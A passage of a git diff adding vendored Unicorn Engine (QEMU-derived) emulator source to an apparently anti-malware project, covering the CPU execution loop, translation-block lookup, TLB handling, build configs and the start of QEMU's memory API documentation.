cpu->interrupt_request; + + if (unlikely(interrupt_request)) { + if (unlikely(cpu->singlestep_enabled & SSTEP_NOIRQ)) { + /* Mask out external interrupts for this step. */ + interrupt_request &= ~CPU_INTERRUPT_SSTEP_MASK; + } + + if (interrupt_request & CPU_INTERRUPT_DEBUG) { + cpu->interrupt_request &= ~CPU_INTERRUPT_DEBUG; + cpu->exception_index = EXCP_DEBUG; + cpu_loop_exit(cpu); + } + + if (interrupt_request & CPU_INTERRUPT_HALT) { + cpu->interrupt_request &= ~CPU_INTERRUPT_HALT; + cpu->halted = 1; + cpu->exception_index = EXCP_HLT; + cpu_loop_exit(cpu); + } +#if defined(TARGET_I386) + if (interrupt_request & CPU_INTERRUPT_INIT) { + cpu_svm_check_intercept_param(env, SVM_EXIT_INIT, 0); + do_cpu_init(x86_cpu); + cpu->exception_index = EXCP_HALTED; + cpu_loop_exit(cpu); + } +#else + if (interrupt_request & CPU_INTERRUPT_RESET) { + cpu_reset(cpu); + } +#endif + /* The target hook has 3 exit conditions: + False when the interrupt isn't processed, + True when it is, and we should restart on a new TB, + and via longjmp via cpu_loop_exit. */ + if (cc->cpu_exec_interrupt(cpu, interrupt_request)) { + next_tb = 0; + } + + /* Don't use the cached interrupt_request value, + do_interrupt may have updated the EXITTB flag. */ + if (cpu->interrupt_request & CPU_INTERRUPT_EXITTB) { + cpu->interrupt_request &= ~CPU_INTERRUPT_EXITTB; + /* ensure that no TB jump will be modified as + the program flow was changed */ + next_tb = 0; + } + } + + if (unlikely(cpu->exit_request)) { + cpu->exit_request = 0; + cpu->exception_index = EXCP_INTERRUPT; + cpu_loop_exit(cpu); + } + + tb = tb_find_fast(env); // qq + if (!tb) { // invalid TB due to invalid code? + uc->invalid_error = UC_ERR_FETCH_UNMAPPED; + ret = EXCP_HLT; + break; + } + + /* Note: we do it here to avoid a gcc bug on Mac OS X when + doing it in tb_find_slow */ + if (tcg_ctx->tb_ctx.tb_invalidated_flag) { + /* as some TB could have been invalidated because + of memory exceptions while generating the code, we + must recompute the hash index here */ + next_tb = 0; + tcg_ctx->tb_ctx.tb_invalidated_flag = 0; + } + + /* see if we can patch the calling TB. When the TB + spans two pages, we cannot safely do a direct + jump. */ + if (next_tb != 0 && tb->page_addr[1] == -1) { + tb_add_jump((TranslationBlock *)(next_tb & ~TB_EXIT_MASK), + next_tb & TB_EXIT_MASK, tb); + } + + /* cpu_interrupt might be called while translating the + TB, but before it is linked into a potentially + infinite loop and becomes env->current_tb. Avoid + starting execution if there is a pending interrupt. */ + cpu->current_tb = tb; + barrier(); + if (likely(!cpu->exit_request)) { + tc_ptr = tb->tc_ptr; + /* execute the generated code */ + next_tb = cpu_tb_exec(cpu, tc_ptr); // qq + + switch (next_tb & TB_EXIT_MASK) { + case TB_EXIT_REQUESTED: + /* Something asked us to stop executing + * chained TBs; just continue round the main + * loop. Whatever requested the exit will also + * have set something else (eg exit_request or + * interrupt_request) which we will handle + * next time around the loop. + */ + tb = (TranslationBlock *)(next_tb & ~TB_EXIT_MASK); + next_tb = 0; + break; + default: + break; + } + } + + cpu->current_tb = NULL; + /* reset soft MMU for next block (it can currently + only be set by a memory fault) */ + } /* for(;;) */ + } else { + /* Reload env after longjmp - the compiler may have smashed all + * local variables as longjmp is marked 'noreturn'. */ + cpu = uc->current_cpu; + env = cpu->env_ptr; + cc = CPU_GET_CLASS(uc, cpu); +#ifdef TARGET_I386 + x86_cpu = X86_CPU(uc, cpu); +#endif + } + } /* for(;;) */ + + // Unicorn: Clear any TCG exit flag that might have been left set by exit requests + uc->current_cpu->tcg_exit_req = 0; + + cc->cpu_exec_exit(cpu); + + // Unicorn: flush JIT cache to because emulation might stop in + // the middle of translation, thus generate incomplete code. + // TODO: optimize this for better performance + tb_flush(env); + + /* fail safe : never use current_cpu outside cpu_exec() */ + // uc->current_cpu = NULL; + + return ret; +} + +/* Execute a TB, and fix up the CPU state afterwards if necessary */ +static tcg_target_ulong cpu_tb_exec(CPUState *cpu, uint8_t *tb_ptr) +{ + CPUArchState *env = cpu->env_ptr; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + uintptr_t next_tb; + + next_tb = tcg_qemu_tb_exec(env, tb_ptr); + + if ((next_tb & TB_EXIT_MASK) > TB_EXIT_IDX1) { + /* We didn't start executing this TB (eg because the instruction + * counter hit zero); we must restore the guest PC to the address + * of the start of the TB. + */ + CPUClass *cc = CPU_GET_CLASS(env->uc, cpu); + TranslationBlock *tb = (TranslationBlock *)(next_tb & ~TB_EXIT_MASK); + + /* Both set_pc() & synchronize_fromtb() can be ignored when code tracing hook is installed, + * or timer mode is in effect, since these already fix the PC. + */ + if (!HOOK_EXISTS(env->uc, UC_HOOK_CODE) && !env->uc->timeout) { + if (cc->synchronize_from_tb) { + // avoid sync twice when helper_uc_tracecode() already did this. + if (env->uc->emu_counter <= env->uc->emu_count && + !env->uc->stop_request && !env->uc->quit_request) + cc->synchronize_from_tb(cpu, tb); + } else { + assert(cc->set_pc); + // avoid sync twice when helper_uc_tracecode() already did this. + if (env->uc->emu_counter <= env->uc->emu_count && + !env->uc->stop_request && !env->uc->quit_request) + cc->set_pc(cpu, tb->pc); + } + } + } + + if ((next_tb & TB_EXIT_MASK) == TB_EXIT_REQUESTED) { + /* We were asked to stop executing TBs (probably a pending + * interrupt. We've now stopped, so clear the flag. + */ + cpu->tcg_exit_req = 0; + } + + return next_tb; +} + +static TranslationBlock *tb_find_slow(CPUArchState *env, target_ulong pc, + target_ulong cs_base, uint64_t flags) // qq +{ + CPUState *cpu = ENV_GET_CPU(env); + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TranslationBlock *tb, **ptb1; + unsigned int h; + tb_page_addr_t phys_pc, phys_page1; + target_ulong virt_page2; + + tcg_ctx->tb_ctx.tb_invalidated_flag = 0; + + /* find translated block using physical mappings */ + phys_pc = get_page_addr_code(env, pc); // qq + if (phys_pc == -1) { // invalid code? + return NULL; + } + phys_page1 = phys_pc & TARGET_PAGE_MASK; + h = tb_phys_hash_func(phys_pc); + ptb1 = &tcg_ctx->tb_ctx.tb_phys_hash[h]; + for(;;) { + tb = *ptb1; + if (!tb) + goto not_found; + if (tb->pc == pc && + tb->page_addr[0] == phys_page1 && + tb->cs_base == cs_base && + tb->flags == flags) { + /* check next page if needed */ + if (tb->page_addr[1] != -1) { + tb_page_addr_t phys_page2; + + virt_page2 = (pc & TARGET_PAGE_MASK) + + TARGET_PAGE_SIZE; + phys_page2 = get_page_addr_code(env, virt_page2); + if (tb->page_addr[1] == phys_page2) + goto found; + } else { + goto found; + } + } + ptb1 = &tb->phys_hash_next; + } +not_found: + /* if no translated code available, then translate it now */ + tb = tb_gen_code(cpu, pc, cs_base, (int)flags, 0); // qq + if (tb == NULL) { + return NULL; + } + +found: + /* Move the last found TB to the head of the list */ + if (likely(*ptb1)) { + *ptb1 = tb->phys_hash_next; + tb->phys_hash_next = tcg_ctx->tb_ctx.tb_phys_hash[h]; + tcg_ctx->tb_ctx.tb_phys_hash[h] = tb; + } + /* we add the TB in the virtual pc hash table */ + cpu->tb_jmp_cache[tb_jmp_cache_hash_func(pc)] = tb; + return tb; +} + +static TranslationBlock *tb_find_fast(CPUArchState *env) // qq +{ + CPUState *cpu = ENV_GET_CPU(env); + TranslationBlock *tb; + target_ulong cs_base, pc; + int flags; + + /* we record a subset of the CPU state. It will + always be the same before a given translated block + is executed. */ + cpu_get_tb_cpu_state(env, &pc, &cs_base, &flags); + tb = cpu->tb_jmp_cache[tb_jmp_cache_hash_func(pc)]; + if (unlikely(!tb || tb->pc != pc || tb->cs_base != cs_base || + tb->flags != flags)) { + tb = tb_find_slow(env, pc, cs_base, flags); // qq + } + return tb; +} + +static void cpu_handle_debug_exception(CPUArchState *env) +{ + CPUState *cpu = ENV_GET_CPU(env); + CPUClass *cc = CPU_GET_CLASS(env->uc, cpu); + CPUWatchpoint *wp; + + if (!cpu->watchpoint_hit) { + QTAILQ_FOREACH(wp, &cpu->watchpoints, entry) { + wp->flags &= ~BP_WATCHPOINT_HIT; + } + } + + cc->debug_excp_handler(cpu); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/cpus.c b/ai_anti_malware/unicorn/unicorn-master/qemu/cpus.c new file mode 100644 index 0000000..28509d5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/cpus.c @@ -0,0 +1,213 @@ +/* + * QEMU System Emulator + * + * Copyright (c) 2003-2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +/* Needed early for CONFIG_BSD etc. */ +#include "config-host.h" +#include "sysemu/sysemu.h" +#include "sysemu/cpus.h" +#include "qemu/thread.h" + +#include "exec/address-spaces.h" // debug, can be removed later + +#include "uc_priv.h" + +static bool cpu_can_run(CPUState *cpu); +static void cpu_handle_guest_debug(CPUState *cpu); +static int tcg_cpu_exec(struct uc_struct *uc, CPUArchState *env); +static bool tcg_exec_all(struct uc_struct* uc); +static int qemu_tcg_init_vcpu(CPUState *cpu); +static void qemu_tcg_cpu_loop(struct uc_struct *uc); + +int vm_start(struct uc_struct* uc) +{ + if (resume_all_vcpus(uc)) { + return -1; + } + return 0; +} + +bool cpu_is_stopped(CPUState *cpu) +{ + return cpu->stopped; +} + +void run_on_cpu(CPUState *cpu, void (*func)(void *data), void *data) +{ + func(data); +} + +int resume_all_vcpus(struct uc_struct *uc) +{ + CPUState *cpu = uc->cpu; + // Fix call multiple time (vu). + // We have to check whether this is the second time, then reset all CPU. + if (!cpu->created) { + cpu->created = true; + cpu->halted = 0; + if (qemu_init_vcpu(cpu)) + return -1; + } + + cpu->exit_request = 0; + + //qemu_clock_enable(QEMU_CLOCK_VIRTUAL, true); + cpu_resume(cpu); + qemu_tcg_cpu_loop(uc); + + return 0; +} + +int qemu_init_vcpu(CPUState *cpu) +{ + cpu->nr_cores = smp_cores; + cpu->nr_threads = smp_threads; + cpu->stopped = true; + + if (tcg_enabled(cpu->uc)) + return qemu_tcg_init_vcpu(cpu); + + return 0; +} + +static void qemu_tcg_cpu_loop(struct uc_struct *uc) +{ + CPUState *cpu = uc->cpu; + + //qemu_tcg_init_cpu_signals(); + + cpu->created = true; + + while (1) { + if (tcg_exec_all(uc)) + break; + } + + cpu->created = false; +} + +static int qemu_tcg_init_vcpu(CPUState *cpu) +{ + tcg_cpu_address_space_init(cpu, cpu->as); + + return 0; +} + +static int tcg_cpu_exec(struct uc_struct *uc, CPUArchState *env) +{ + return cpu_exec(uc, env); +} + +static bool tcg_exec_all(struct uc_struct* uc) +{ + int r; + bool finish = false; + while (!uc->exit_request) { + CPUState *cpu = uc->cpu; + CPUArchState *env = cpu->env_ptr; + + //qemu_clock_enable(QEMU_CLOCK_VIRTUAL, + // (cpu->singlestep_enabled & SSTEP_NOTIMER) == 0); + if (cpu_can_run(cpu)) { + uc->quit_request = false; + r = tcg_cpu_exec(uc, env); + + // quit current TB but continue emulating? + if (uc->quit_request) { + // reset stop_request + uc->stop_request = false; + } else if (uc->stop_request) { + //printf(">>> got STOP request!!!\n"); + finish = true; + break; + } + + // save invalid memory access error & quit + if (env->invalid_error) { + // printf(">>> invalid memory accessed, STOP = %u!!!\n", env->invalid_error); + uc->invalid_addr = env->invalid_addr; + uc->invalid_error = env->invalid_error; + finish = true; + break; + } + + // printf(">>> stop with r = %x, HLT=%x\n", r, EXCP_HLT); + if (r == EXCP_DEBUG) { + cpu_handle_guest_debug(cpu); + break; + } + if (r == EXCP_HLT) { + //printf(">>> got HLT!!!\n"); + finish = true; + break; + } + } else if (cpu->stop || cpu->stopped) { + // printf(">>> got stopped!!!\n"); + break; + } + } + uc->exit_request = 0; + + return finish; +} + +static bool cpu_can_run(CPUState *cpu) +{ + if (cpu->stop) { + return false; + } + if (cpu_is_stopped(cpu)) { + return false; + } + return true; +} + +static void cpu_handle_guest_debug(CPUState *cpu) +{ + cpu->stopped = true; +} + +#if 0 +#ifndef _WIN32 +static void qemu_tcg_init_cpu_signals(void) +{ + sigset_t set; + struct sigaction sigact; + + memset(&sigact, 0, sizeof(sigact)); + sigact.sa_handler = cpu_signal; + sigaction(SIG_IPI, &sigact, NULL); + + sigemptyset(&set); + sigaddset(&set, SIG_IPI); + pthread_sigmask(SIG_UNBLOCK, &set, NULL); +} +#else /* _WIN32 */ +static void qemu_tcg_init_cpu_signals(void) +{ +} +#endif /* _WIN32 */ +#endif + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/cputlb.c b/ai_anti_malware/unicorn/unicorn-master/qemu/cputlb.c new file mode 100644 index 0000000..fd0bb80 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/cputlb.c @@ -0,0 +1,426 @@ +/* + * Common CPU TLB handling + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "config.h" +#include "cpu.h" +#include "exec/exec-all.h" +#include "exec/memory.h" +#include "exec/address-spaces.h" +#include "exec/cpu_ldst.h" + +#include "exec/cputlb.h" + +#include "exec/memory-internal.h" +#include "exec/ram_addr.h" +#include "tcg/tcg.h" + +#include "uc_priv.h" + +//#define DEBUG_TLB +//#define DEBUG_TLB_CHECK + +static void tlb_flush_entry(CPUTLBEntry *tlb_entry, target_ulong addr); +static bool tlb_is_dirty_ram(CPUTLBEntry *tlbe); +static bool qemu_ram_addr_from_host_nofail(struct uc_struct *uc, void *ptr, ram_addr_t *addr); +static void tlb_add_large_page(CPUArchState *env, target_ulong vaddr, + target_ulong size); +static void tlb_set_dirty1(CPUTLBEntry *tlb_entry, target_ulong vaddr); + +/* statistics */ +//int tlb_flush_count; + +/* NOTE: + * If flush_global is true (the usual case), flush all tlb entries. + * If flush_global is false, flush (at least) all tlb entries not + * marked global. + * + * Since QEMU doesn't currently implement a global/not-global flag + * for tlb entries, at the moment tlb_flush() will also flush all + * tlb entries in the flush_global == false case. This is OK because + * CPU architectures generally permit an implementation to drop + * entries from the TLB at any time, so flushing more entries than + * required is only an efficiency issue, not a correctness issue. + */ +void tlb_flush(CPUState *cpu, int flush_global) +{ + CPUArchState *env = cpu->env_ptr; + +#if defined(DEBUG_TLB) + printf("tlb_flush:\n"); +#endif + /* must reset current TB so that interrupts cannot modify the + links while we are modifying them */ + cpu->current_tb = NULL; + + memset(env->tlb_table, -1, sizeof(env->tlb_table)); + memset(env->tlb_v_table, -1, sizeof(env->tlb_v_table)); + memset(cpu->tb_jmp_cache, 0, sizeof(cpu->tb_jmp_cache)); + + env->vtlb_index = 0; + env->tlb_flush_addr = -1; + env->tlb_flush_mask = 0; + //tlb_flush_count++; +} + +void tlb_flush_page(CPUState *cpu, target_ulong addr) +{ + CPUArchState *env = cpu->env_ptr; + int i; + int mmu_idx; + +#if defined(DEBUG_TLB) + printf("tlb_flush_page: " TARGET_FMT_lx "\n", addr); +#endif + /* Check if we need to flush due to large pages. */ + if ((addr & env->tlb_flush_mask) == env->tlb_flush_addr) { +#if defined(DEBUG_TLB) + printf("tlb_flush_page: forced full flush (" + TARGET_FMT_lx "/" TARGET_FMT_lx ")\n", + env->tlb_flush_addr, env->tlb_flush_mask); +#endif + tlb_flush(cpu, 1); + return; + } + /* must reset current TB so that interrupts cannot modify the + links while we are modifying them */ + cpu->current_tb = NULL; + + addr &= TARGET_PAGE_MASK; + i = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { + tlb_flush_entry(&env->tlb_table[mmu_idx][i], addr); + } + + /* check whether there are entries that need to be flushed in the vtlb */ + for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { + int k; + for (k = 0; k < CPU_VTLB_SIZE; k++) { + tlb_flush_entry(&env->tlb_v_table[mmu_idx][k], addr); + } + } + + tb_flush_jmp_cache(cpu, addr); +} + +/* update the TLBs so that writes to code in the virtual page 'addr' + can be detected */ +void tlb_protect_code(struct uc_struct *uc, ram_addr_t ram_addr) +{ + cpu_physical_memory_reset_dirty(uc, ram_addr, TARGET_PAGE_SIZE, + DIRTY_MEMORY_CODE); +} + +/* update the TLB so that writes in physical page 'phys_addr' are no longer + tested for self modifying code */ +void tlb_unprotect_code_phys(CPUState *cpu, ram_addr_t ram_addr, + target_ulong vaddr) +{ + cpu_physical_memory_set_dirty_flag(cpu->uc, ram_addr, DIRTY_MEMORY_CODE); +} + +void tlb_reset_dirty_range(CPUTLBEntry *tlb_entry, uintptr_t start, + uintptr_t length) +{ + uintptr_t addr; + + if (tlb_is_dirty_ram(tlb_entry)) { + addr = (tlb_entry->addr_write & TARGET_PAGE_MASK) + tlb_entry->addend; + if ((addr - start) < length) { + tlb_entry->addr_write |= TLB_NOTDIRTY; + } + } +} + +void cpu_tlb_reset_dirty_all(struct uc_struct *uc, + ram_addr_t start1, ram_addr_t length) +{ + CPUState *cpu = uc->cpu; + CPUArchState *env; + + int mmu_idx; + + env = cpu->env_ptr; + for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { + unsigned int i; + + for (i = 0; i < CPU_TLB_SIZE; i++) { + tlb_reset_dirty_range(&env->tlb_table[mmu_idx][i], + start1, length); + } + + for (i = 0; i < CPU_VTLB_SIZE; i++) { + tlb_reset_dirty_range(&env->tlb_v_table[mmu_idx][i], + start1, length); + } + } +} + +/* update the TLB corresponding to virtual page vaddr + so that it is no longer dirty */ +void tlb_set_dirty(CPUArchState *env, target_ulong vaddr) +{ + int i; + int mmu_idx; + + vaddr &= TARGET_PAGE_MASK; + i = (vaddr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { + tlb_set_dirty1(&env->tlb_table[mmu_idx][i], vaddr); + } + + for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { + int k; + for (k = 0; k < CPU_VTLB_SIZE; k++) { + tlb_set_dirty1(&env->tlb_v_table[mmu_idx][k], vaddr); + } + } +} + + +/* Add a new TLB entry. At most one entry for a given virtual address + is permitted. Only a single TARGET_PAGE_SIZE region is mapped, the + supplied size is only used by tlb_flush_page. */ +void tlb_set_page(CPUState *cpu, target_ulong vaddr, + hwaddr paddr, int prot, + int mmu_idx, target_ulong size) +{ + CPUArchState *env = cpu->env_ptr; + MemoryRegionSection *section; + unsigned int index; + target_ulong address; + target_ulong code_address; + uintptr_t addend; + CPUTLBEntry *te; + hwaddr iotlb, xlat, sz; + unsigned vidx = env->vtlb_index++ % CPU_VTLB_SIZE; + + assert(size >= TARGET_PAGE_SIZE); + if (size != TARGET_PAGE_SIZE) { + tlb_add_large_page(env, vaddr, size); + } + + sz = size; + section = address_space_translate_for_iotlb(cpu->as, paddr, + &xlat, &sz); + assert(sz >= TARGET_PAGE_SIZE); + +#if defined(DEBUG_TLB) + printf("tlb_set_page: vaddr=" TARGET_FMT_lx " paddr=0x" TARGET_FMT_plx + " prot=%x idx=%d\n", + vaddr, paddr, prot, mmu_idx); +#endif + + address = vaddr; + if (!memory_region_is_ram(section->mr) && !memory_region_is_romd(section->mr)) { + /* IO memory case */ + address |= TLB_MMIO; + addend = 0; + } else { + /* TLB_MMIO for rom/romd handled below */ + addend = (uintptr_t)((char*)memory_region_get_ram_ptr(section->mr) + xlat); + } + + code_address = address; + iotlb = memory_region_section_get_iotlb(cpu, section, vaddr, paddr, xlat, + prot, &address); + + index = (vaddr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + te = &env->tlb_table[mmu_idx][index]; + + /* do not discard the translation in te, evict it into a victim tlb */ + env->tlb_v_table[mmu_idx][vidx] = *te; + env->iotlb_v[mmu_idx][vidx] = env->iotlb[mmu_idx][index]; + + /* refill the tlb */ + env->iotlb[mmu_idx][index] = iotlb - vaddr; + te->addend = (uintptr_t)(addend - vaddr); + if (prot & PAGE_READ) { + te->addr_read = address; + } else { + te->addr_read = -1; + } + + if (prot & PAGE_EXEC) { + te->addr_code = code_address; + } else { + te->addr_code = -1; + } + if (prot & PAGE_WRITE) { + if ((memory_region_is_ram(section->mr) && section->readonly) + || memory_region_is_romd(section->mr)) { + /* Write access calls the I/O callback. */ + te->addr_write = address | TLB_MMIO; + } else if (memory_region_is_ram(section->mr) + && cpu_physical_memory_is_clean(cpu->uc, (ram_addr_t)(section->mr->ram_addr + + xlat))) { + te->addr_write = address | TLB_NOTDIRTY; + } else { + te->addr_write = address; + } + } else { + te->addr_write = -1; + } +} + +/* NOTE: this function can trigger an exception */ +/* NOTE2: the returned address is not exactly the physical address: it + * is actually a ram_addr_t (in system mode; the user mode emulation + * version of this function returns a guest virtual address). + */ +tb_page_addr_t get_page_addr_code(CPUArchState *env1, target_ulong addr) +{ + int mmu_idx, page_index, pd; + void *p; + MemoryRegion *mr; + ram_addr_t ram_addr; + CPUState *cpu = ENV_GET_CPU(env1); + + page_index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + mmu_idx = cpu_mmu_index(env1); + + if ((mmu_idx < 0) || (mmu_idx >= NB_MMU_MODES)) { + return -1; + } + + if (unlikely(env1->tlb_table[mmu_idx][page_index].addr_code != + (addr & TARGET_PAGE_MASK))) { + cpu_ldub_code(env1, addr); + //check for NX related error from softmmu + if (env1->invalid_error == UC_ERR_FETCH_PROT) { + return -1; + } + } + pd = env1->iotlb[mmu_idx][page_index] & ~TARGET_PAGE_MASK; + mr = iotlb_to_region(cpu->as, pd); + if (memory_region_is_unassigned(cpu->uc, mr)) { + CPUClass *cc = CPU_GET_CLASS(env1->uc, cpu); + + if (cc->do_unassigned_access) { + cc->do_unassigned_access(cpu, addr, false, true, 0, 4); + } else { + //cpu_abort(cpu, "Trying to execute code outside RAM or ROM at 0x" + // TARGET_FMT_lx "\n", addr); // qq + env1->invalid_addr = addr; + env1->invalid_error = UC_ERR_FETCH_UNMAPPED; + return -1; + } + } + p = (void *)((uintptr_t)addr + env1->tlb_table[mmu_idx][page_index].addend); + if (!qemu_ram_addr_from_host_nofail(cpu->uc, p, &ram_addr)) { + env1->invalid_addr = addr; + env1->invalid_error = UC_ERR_FETCH_UNMAPPED; + return -1; + } else + return ram_addr; +} + +static bool qemu_ram_addr_from_host_nofail(struct uc_struct *uc, void *ptr, ram_addr_t *ram_addr) +{ + if (qemu_ram_addr_from_host(uc, ptr, ram_addr) == NULL) { + // fprintf(stderr, "Bad ram pointer %p\n", ptr); + return false; + } + + return true; +} + +static void tlb_set_dirty1(CPUTLBEntry *tlb_entry, target_ulong vaddr) +{ + if (tlb_entry->addr_write == (vaddr | TLB_NOTDIRTY)) { + tlb_entry->addr_write = vaddr; + } +} + +/* Our TLB does not support large pages, so remember the area covered by + large pages and trigger a full TLB flush if these are invalidated. */ +static void tlb_add_large_page(CPUArchState *env, target_ulong vaddr, + target_ulong size) +{ + target_ulong mask = ~(size - 1); + + if (env->tlb_flush_addr == (target_ulong)-1) { + env->tlb_flush_addr = vaddr & mask; + env->tlb_flush_mask = mask; + return; + } + /* Extend the existing region to include the new page. + This is a compromise between unnecessary flushes and the cost + of maintaining a full variable size TLB. */ + mask &= env->tlb_flush_mask; + while (((env->tlb_flush_addr ^ vaddr) & mask) != 0) { + mask <<= 1; + } + env->tlb_flush_addr &= mask; + env->tlb_flush_mask = mask; +} + +static bool tlb_is_dirty_ram(CPUTLBEntry *tlbe) +{ + return (tlbe->addr_write & (TLB_INVALID_MASK|TLB_MMIO|TLB_NOTDIRTY)) == 0; +} + + +static void tlb_flush_entry(CPUTLBEntry *tlb_entry, target_ulong addr) +{ + if (addr == (tlb_entry->addr_read & + (TARGET_PAGE_MASK | TLB_INVALID_MASK)) || + addr == (tlb_entry->addr_write & + (TARGET_PAGE_MASK | TLB_INVALID_MASK)) || + addr == (tlb_entry->addr_code & + (TARGET_PAGE_MASK | TLB_INVALID_MASK))) { + memset(tlb_entry, -1, sizeof(*tlb_entry)); + } +} + + +#define MMUSUFFIX _mmu + +#define SHIFT 0 +#include "softmmu_template.h" + +#define SHIFT 1 +#include "softmmu_template.h" + +#define SHIFT 2 +#include "softmmu_template.h" + +#define SHIFT 3 +#include "softmmu_template.h" +#undef MMUSUFFIX + +#define MMUSUFFIX _cmmu +#undef GETPC_ADJ +#define GETPC_ADJ 0 +#undef GETRA +#define GETRA() ((uintptr_t)0) +#define SOFTMMU_CODE_ACCESS + +#define SHIFT 0 +#include "softmmu_template.h" + +#define SHIFT 1 +#include "softmmu_template.h" + +#define SHIFT 2 +#include "softmmu_template.h" + +#define SHIFT 3 +#include "softmmu_template.h" diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/aarch64-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/aarch64-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/aarch64eb-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/aarch64eb-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/arm-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/arm-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/armeb-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/armeb-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/m68k-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/m68k-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips64-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips64-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips64el-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips64el-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mipsel-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mipsel-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/sparc-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/sparc-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/sparc64-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/sparc64-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/x86_64-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/x86_64-softmmu.mak new file mode 100644 index 0000000..6826a92 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/x86_64-softmmu.mak @@ -0,0 +1,3 @@ +# Default configuration for x86_64-softmmu + +CONFIG_APIC=y diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/docs/memory.txt b/ai_anti_malware/unicorn/unicorn-master/qemu/docs/memory.txt new file mode 100644 index 0000000..b12f1f0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/docs/memory.txt @@ -0,0 +1,244 @@ +The memory API +============== + +The memory API models the memory and I/O buses and controllers of a QEMU +machine. It attempts to allow modelling of: + + - ordinary RAM + - memory-mapped I/O (MMIO) + - memory controllers that can dynamically reroute physical memory regions + to different destinations + +The memory model provides support for + + - tracking RAM changes by the guest + - setting up coalesced memory for kvm + - setting up ioeventfd regions for kvm + +Memory is modelled as an acyclic graph of MemoryRegion objects. Sinks +(leaves) are RAM and MMIO regions, while other nodes represent +buses, memory controllers, and memory regions that have been rerouted. + +In addition to MemoryRegion objects, the memory API provides AddressSpace +objects for every root and possibly 